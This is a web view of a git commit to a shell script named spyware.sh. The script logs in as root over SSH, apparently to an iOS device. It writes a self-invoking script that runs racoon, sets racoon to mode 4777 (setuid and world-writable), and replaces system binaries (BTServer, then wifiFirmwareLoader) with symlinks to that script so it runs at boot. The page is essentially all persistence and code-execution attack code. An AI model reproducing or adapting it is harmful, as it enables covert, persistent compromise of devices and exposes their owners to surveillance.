summaryrefslogtreecommitdiff
path: root/spyware.sh
diff options
context:
space:
mode:
authorspv <aquaticvegetable@gmail.com>2022-04-20 19:44:01 -0400
committerspv <aquaticvegetable@gmail.com>2022-04-20 19:44:01 -0400
commit64ef7cbaf51af9a60c19ff28c8cb5537c8134454 (patch)
treee177ac42e5ad69c53ed8460458892313f489814b /spyware.sh
parentf92ed682982d7fa7d1afe2e61aefd42050649ea8 (diff)
wip
Diffstat (limited to 'spyware.sh')
-rwxr-xr-xspyware.sh8
1 files changed, 4 insertions, 4 deletions
diff --git a/spyware.sh b/spyware.sh
index fb79486..dac5939 100755
--- a/spyware.sh
+++ b/spyware.sh
@@ -3,7 +3,7 @@
ssh root@localhost -p 2222 << EOF
rm -rf /untether/
mkdir /untether/
-echo "#!/usr/local/bin/scripter -q -cf" > /untether/get_code_exec
+echo "#!/usr/local/bin/scripter_ -q -cf" > /untether/get_code_exec
echo "execute(\"/usr/sbin/racoon\");" >> /untether/get_code_exec
echo "execute(\"/usr/sbin/racoon\");" >> /untether/get_code_exec
echo "execute(\"/usr/sbin/racoon\");" >> /untether/get_code_exec
@@ -32,8 +32,8 @@ echo "execute(\"/usr/sbin/racoon\");" >> /untether/get_code_exec
echo "execute(\"/untether/get_code_exec\");" >> /untether/get_code_exec
chmod +x /untether/get_code_exec
mkdir /usr/local/bin/
-cp -p /usr/libexec/dhcpd /usr/local/bin/scripter
+cp -p /usr/libexec/dhcpd /usr/local/bin/scripter_
chmod 4777 /usr/sbin/racoon
-mv /usr/sbin/BTServer /usr/sbin/BTServer_
-ln -s /untether/get_code_exec /usr/sbin/BTServer
+mv /usr/libexec/wifiFirmwareLoader /usr/libexec/wifiFirmwareLoader_
+ln -s /untether/get_code_exec /usr/libexec/wifiFirmwareLoader
EOF \ No newline at end of file